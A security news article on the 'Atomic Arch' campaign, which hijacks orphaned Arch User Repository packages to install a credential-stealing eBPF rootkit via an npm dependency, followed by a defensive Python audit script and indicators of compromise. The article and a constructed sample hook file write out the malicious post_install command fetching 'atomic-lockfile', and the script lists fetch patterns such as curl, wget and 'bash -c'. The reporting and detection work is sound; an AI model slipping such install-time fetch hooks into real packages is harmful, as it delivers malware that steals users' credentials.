Atomic Arch Campaign Hijacks 20+ Linux AUR Packages to Deliver Malware
Atomic Arch campaign hijacks 20+ Linux AUR packages to deliver malware via ownership transfers.
Summary
The Atomic Arch campaign is exploiting the Arch User Repository (AUR) ownership transfer process to distribute malware. Threat actors are taking over abandoned packages, rewriting build instructions to include malicious dependencies like 'atomic-lockfile', which then deploys a rootkit-like payload using eBPF. This payload hides its presence and steals sensitive data including credentials, GitHub keys, and tokens.
Full text
By Deeba Ahmed, June 12, 2026

Research firm Sonatype has discovered a malicious campaign that targets Linux systems in an unusual way: rather than exploiting a bug in any program, the attackers abuse the open-source ownership transfer process itself to deliver malware. The campaign is dubbed "Atomic Arch" because it targets the Arch User Repository (AUR), a community platform where members maintain the build scripts used to install software packages on Arch Linux.

When a maintainer walks away from a package it becomes orphaned, which means any other user can request ownership and take over the abandoned project. Because the package keeps its original name and trusted history, users who update it receive the malicious version without any reason for suspicion. According to the researchers, more than 20 AUR packages have already been compromised. Sonatype shared the technical details of this ongoing software supply chain attack with Hackread.com.

Inside the Attack Chain

Sonatype engineer Eyad Hasan first flagged the issue, and the follow-up investigation showed that the threat actors do not alter the original application source code at all. Instead, they rewrite the build instructions in the package's PKGBUILD configuration file. When a user installs or updates the software, a modified post-install script automatically runs the command npm install atomic-lockfile minimist chalk, which pulls a malicious dependency called atomic-lockfile, the primary malware package used in this attack, from the public npm registry. The researchers noted that the hijacked AUR package itself looks perfectly clean, which is why standard signature-based security tools fail to flag the threat.
Sonatype Research Labs is tracking the atomic-lockfile dependency under the reference Sonatype-2026-003775 and has assigned it a high-severity CVSS score of 8.7.

Advanced Stealth Techniques

Sonatype researcher Adam Reynolds analysed the atomic-lockfile package and found a bundled native Linux binary. Triggered from the preinstall script phase declared in the package's package.json, this binary deploys a second-stage payload using a Linux kernel technology called eBPF. Further probing showed that the malware loads a program source file named scales.bpf.c to gain rootkit-like capabilities: by tampering with the system calls that list directory contents, it hides its files and processes from the user. It also monitors the running system for debuggers and blocks security tools from analysing it.

The payload then focuses on stealing credentials. It looks for GitHub keys, SSH data, HashiCorp Vault tokens, browser cookies, and saved data from communication tools such as Slack, Discord, Microsoft Teams, and Telegram. The stolen data is sent directly to the attacker using built-in web upload tools.

Although these techniques closely resemble an older campaign called IronWorm, Sonatype has not officially linked Atomic Arch to a specific threat group. The researchers warn that simply deleting the hijacked package will not clean a machine on which the kernel-level payload is already running.
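The two hooks the write-up describes, a PKGBUILD or .install function that shells out to npm at install time, and an npm lifecycle script (preinstall) that launches a bundled binary, are both visible in plain text before anything runs. The following audit script is an added example, not code from Sonatype or Hackread: it walks the hook functions of a PKGBUILD-style bash file, flags any line that fetches from a package registry or the network, and lists the lifecycle scripts declared in a package.json. The function names in HOOK_FUNCS are the standard PKGBUILD and .install hook names; the sample files below are constructed for the demonstration (the path ./native/helper is a placeholder, not a real indicator).

```python
"""Audit AUR build scripts and npm manifests for install-time fetch hooks.

Added example (not Sonatype's or Hackread's code). The sample inputs at the
bottom are constructed to resemble the pattern described in the write-up.
"""
import json
import re

# Standard PKGBUILD functions and .install hook functions that run on the
# user's machine during build, install, upgrade or removal.
HOOK_FUNCS = {
    "prepare", "build", "check", "package",
    "pre_install", "post_install", "pre_upgrade", "post_upgrade",
    "pre_remove", "post_remove",
}

# Commands that reach out to a registry or the network from inside a hook.
FETCH_PATTERNS = [
    (re.compile(r"\bnpm\s+(?:i|install|ci)\b"), "npm install"),
    (re.compile(r"\bpip3?\s+install\b"), "pip install"),
    (re.compile(r"\b(?:curl|wget)\b"), "direct download"),
    (re.compile(r"\b(?:bash|sh)\s+-c\b"), "inline shell"),
]

# npm lifecycle scripts that execute automatically during `npm install`.
LIFECYCLE_KEYS = ("preinstall", "install", "postinstall", "preuninstall", "prepare")


def shell_functions(text):
    """Return [(name, [body lines])] for `name() {` ... `}` blocks.

    Assumes conventional PKGBUILD formatting: one function header per line
    and a body that ends at a line containing only '}'.
    """
    funcs, name, body = [], None, []
    header = re.compile(r"^\s*([A-Za-z_][A-Za-z0-9_]*)\s*\(\)\s*\{")
    for line in text.splitlines():
        m = header.match(line)
        if name is None and m:
            name, body = m.group(1), []
        elif name is not None and line.strip() == "}":
            funcs.append((name, body))
            name = None
        elif name is not None:
            body.append(line)
    return funcs


def audit_build_script(text):
    """Flag fetch commands inside hook functions as (func, label, line)."""
    findings = []
    for fname, body in shell_functions(text):
        if fname not in HOOK_FUNCS:
            continue
        for line in body:
            code = line.split("#", 1)[0]  # ignore trailing bash comments
            for pattern, label in FETCH_PATTERNS:
                if pattern.search(code):
                    findings.append((fname, label, line.strip()))
    return findings


def audit_package_json(text):
    """Return [(script name, command)] for lifecycle scripts in package.json."""
    scripts = json.loads(text).get("scripts", {})
    return [(k, v) for k, v in scripts.items() if k in LIFECYCLE_KEYS]


# ---- constructed samples ------------------------------------------------
BENIGN_PKGBUILD = """\
pkgname=example-tool
pkgver=1.0.0
source=("https://example.invalid/$pkgname-$pkgver.tar.gz")
build() {
  cd "$pkgname-$pkgver"
  make
}
package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
}
"""

# A .install hook file of the shape described in the write-up (constructed).
HIJACKED_INSTALL = """\
post_install() {
  # pulls extra "dependencies" from the public registry on the user's machine
  npm install atomic-lockfile minimist chalk >/dev/null 2>&1
}
post_upgrade() {
  post_install
}
"""

# Constructed manifest; ./native/helper is a placeholder path.
PACKAGE_JSON = """\
{"name": "constructed-sample", "version": "0.0.1",
 "scripts": {"preinstall": "./native/helper", "test": "echo ok"}}
"""

if __name__ == "__main__":
    for label, text in (("PKGBUILD", BENIGN_PKGBUILD), (".install", HIJACKED_INSTALL)):
        for fn, kind, line in audit_build_script(text):
            print(f"[{label}] {fn}(): {kind}: {line}")
    for script, cmd in audit_package_json(PACKAGE_JSON):
        print(f"[package.json] lifecycle script {script!r} runs: {cmd}")
```

Run against a checked-out AUR package directory, the same two functions can be pointed at the real PKGBUILD, its .install file and any node_modules/*/package.json that a post-install npm run would create; a hit in a post_install or post_upgrade hook is exactly the pattern that signature-based scanning of the package tarball misses, because the package contents themselves are unchanged.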
Indicators of Compromise
- malware — atomic-lockfile
- url — https://www.npmjs.com/package/atomic-lockfile
- mitre_attack — T1070.004
- mitre_attack — T1555